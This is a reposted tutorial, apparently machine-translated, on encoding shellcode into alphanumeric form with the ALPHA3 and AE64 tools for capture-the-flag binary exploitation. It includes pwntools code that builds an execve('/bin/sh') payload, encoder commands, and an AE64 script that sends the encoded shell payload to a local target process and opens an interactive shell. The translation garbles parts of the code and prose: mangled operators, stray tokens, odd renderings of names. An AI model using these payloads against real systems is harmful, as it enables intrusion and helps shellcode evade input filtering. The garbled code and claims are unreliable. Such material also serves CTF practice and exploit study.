Shulou(Shulou.com)06/02 Report--

This article introduces the relevant knowledge of "what is the method of generating Shellcode". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

Alpha3

The source code of this tool is on google and can be downloaded from github in China. However, there are some problems when the official code runs in the Linux environment:

% python ALPHA3.pyTraceback (most recent call last): File "ALPHA3.py", line 4, in import charsets, encode, io File "/ home/taqini/ctf_tools/alpha3/encode.py", line 1, in import ALPHA3 File "/ home/taqini/ctf_tools/alpha3/ALPHA3.py", line 5, in import x86, x64, test File "/ home/taqini/ctf_tools/alpha3/test/__init__.py", line 25, in raise OSError ("Unsupported platform for testing."); OSError: Unsupported platform for testing.

Take a look at the error message and find that the error is in test/__init__.py. Open the source code and find a code that determines the platform. If it is not win32, the error is reported. The solution is very simple. You only need to comment out the last two lines of code and modify as follows:

If (sys.platform = = 'win32'): #... TEST_SHELLCODE_OUTPUT = "Hello, world!\ r\ n" # else:# raise OSError ("Unsupported platform for testing.")

Run it again and it will work:

% python ALPHA3.py____, sSSs,s, sSSSs, ALPHA3-Alphanumeric shellcode encoder. DS "Yipp" YS ", SY Version 1.0 alpha iS' dY ssS" Copyright (C) 2003-2009 by SkyLined. YS, dSb SP, SP `"YSS'" S' "YSSSY" http://skypher.com/wiki/index.php/ALPHA3____________________________________________________________________________[Usage] ALPHA3.py [encoder settings | flags O settings | flags] #...

After modification, you still need to compile the source code, but the tool for compiling the source code is also on google. If you don't bother to compile it yourself, you can download my modified version: https://github.com/TaQini/alpha3 directly.

Git clone https://github.com/TaQini/alpha3.git

Generate shellcodefrom pwn import * context.arch='amd64'sc = shellcraft.sh () print asm (sc)

Save the above code as sc.py and put it in the alpha3 directory, then execute the following command to generate the shellcode file to be encoded

Python sc.py > shellcode

By default, x64 sys_execve ("/ bin/sh", 0Pol 0) is generated and can be modified to other arch or shellcode.

X64 alpha coding

Generate x64 alpha shellcode

Python. / ALPHA3.py x64 ascii mixedcase rax-input= "shellcode"

Or use the script I wrote:

. / shellcode_x64.sh rax

Where the input file is shellcode,rax is the register used for encoding (shellcode base address)

For example, there is the following code:

00101246 48 8d LEA RAX, [RBP +-0x410] 85 f 0 fb ff 0010124 d ff d 0 CALL RAX;

Jump to shellcode via call rax, then the register used for encoding in the alpha3 command is rax

The register in which the starting address of the shellcode is stored is the register used for encoding

X86 alpha coding

For shellcode of x64 in alpha3, as long as there is only one case of mixedcase mentioned above, x86 has more options:

X86 ascii uppercase (numbers + uppercase letters)

X86 ascii lowercase (numbers + lowercase letters)

X86 ascii mixedcase (numbers + uppercase and lowercase letters)

The usage is similar to x64, so I won't repeat it.

Full coding mode

All the encoding methods supported by alpha3 are as follows:

Valid base address examples for each encoder, ordered by encoder settings Are: [x64 ascii mixedcase] AscMix (R64) RAX RCX RDX RBX RSP RBP RSI RDI [x86 ascii lowercase] AscLow 0x30 (rm32) ECX EDX EBX [x86 ascii mixedcase] AscMix 0x30 (rm32) EAX ECX EDX EBX ESP EBP ESI EDI [EAX] [ECX] [EDX] [EBX] [ESP] [EBP] [ESI] [EDI] [ESP-4] ECX+2 ESI+4 ESI+8 AscMix 0x30 (i32) (address) AscMix Countslide (rm32) countslide:EAX+offset~uncertainty countslide:EBX+offset~uncertainty countslide:ECX+offset~uncertainty countslide:EDX+offset~uncertainty countslide:ESI+offset~uncertainty countslide:EDI+offset~uncertainty AscMix Countslide (i32) countslide:address~uncertainty AscMix SEH GetPC (XPsp3) seh_getpc_ xpsp3 [x86 ascii uppercase] AscUpp 0x30 (rm32) EAX ECX EDX EBX ESP EBP ESI EDI [EAX] [ECX] [EDX] [EBX] [ESP] [EBP] [EDI] [x86 latin-1 mixedcase] Latin1Mix CALL GetPC call [x86 utf-16 uppercase] UniUpper 0x10 (rm32) EAX ECX EDX EBX ESP EBP ESI EDI [EAX] [ECX] [EDX] [EBX] [ESP] [EBP] [ESI] [EDI] AE64

AE64 is a tool written by a master of Hangzhou Electric Power Company, which is specially used to generate 64-bit aplha shellcode. Download method:

Git clone https://github.com/veritas501/ae64.git

The advantage of AE64 is that you can use registers more flexibly when coding, but the generated alpha shellcode is a little longer than alpha3.

In addition, AE64 is written by python and can be called directly in python. Here is the official Chestnut:

From pwn import * from ae64 import AE64context.log_level = 'debug'context.arch =' amd64'p = process ('. / example1') obj = AE64 () sc = obj.encode (asm (shellcraft.sh ()), 'R13') p.sendline (sc) p.interactive () the content of "what is the Shellcode generation method" ends here, thank you for reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.